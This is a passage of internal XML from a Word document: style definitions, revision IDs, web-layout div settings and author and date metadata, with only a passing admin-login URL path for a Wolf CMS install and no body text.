    <w:rsid w:val="00AB1600"/>
    <w:rsid w:val="00AB2FF2"/>
    <w:rsid w:val="00AE244F"/>
    <w:rsid w:val="00AE2463"/>
    <w:rsid w:val="00AF78E5"/>
    <w:rsid w:val="00B504B4"/>
    <w:rsid w:val="00B653AD"/>
    <w:rsid w:val="00B65BC4"/>
    <w:rsid w:val="00B802BD"/>
    <w:rsid w:val="00BB268D"/>
    <w:rsid w:val="00C32843"/>
    <w:rsid w:val="00C460F1"/>
    <w:rsid w:val="00CD1272"/>
    <w:rsid w:val="00CF0F7B"/>
    <w:rsid w:val="00D35D4F"/>
    <w:rsid w:val="00D43AF9"/>
    <w:rsid w:val="00D56799"/>
    <w:rsid w:val="00D84177"/>
    <w:rsid w:val="00D86F6B"/>
    <w:rsid w:val="00D8705C"/>
    <w:rsid w:val="00DD13DF"/>
    <w:rsid w:val="00E30790"/>
    <w:rsid w:val="00E645E6"/>
    <w:rsid w:val="00EA4E73"/>
    <w:rsid w:val="00EC7BA1"/>
    <w:rsid w:val="00ED22D5"/>
    <w:rsid w:val="00ED555A"/>
    <w:rsid w:val="00F331CB"/>
    <w:rsid w:val="00F33853"/>
    <w:rsid w:val="00FD2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CADB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FF3E597D-1136-4DED-8149-4195AEC6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C611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60F1"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00C460F1"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FD2598"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="trt0xe">
    <w:name w:val="trt0xe"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00A06F2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AF78E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F78E5"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="001C6119"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="27"/>
      <w:szCs w:val="27"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="002C1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C17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C17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C17A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2C17A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C17A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C17A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E30790"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00ED5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D555A"/>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ED55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95235">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="222377094">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="366032675">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="479466808">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="820734398">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1065101068">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1089699000">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1203326977">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1298029579">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1597205109">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1768647261">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1941062989">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2067683348">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="672218610">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="149756601">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="single" w:sz="6" w:space="9" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="single" w:sz="6" w:space="9" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="102506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ip/wolfcms/?/admin/login"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ip/wolfcm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E9336-B7A4-40BC-A725-8AEA832FF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9</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Roshan_DROP_ORG</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>rubal sharma GF202345595</cp:lastModifiedBy>
  <cp:revision>57</cp:revision>
  <cp:lastPrinted>2021-11-05T08:20:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-11-05T08:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-04T12:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>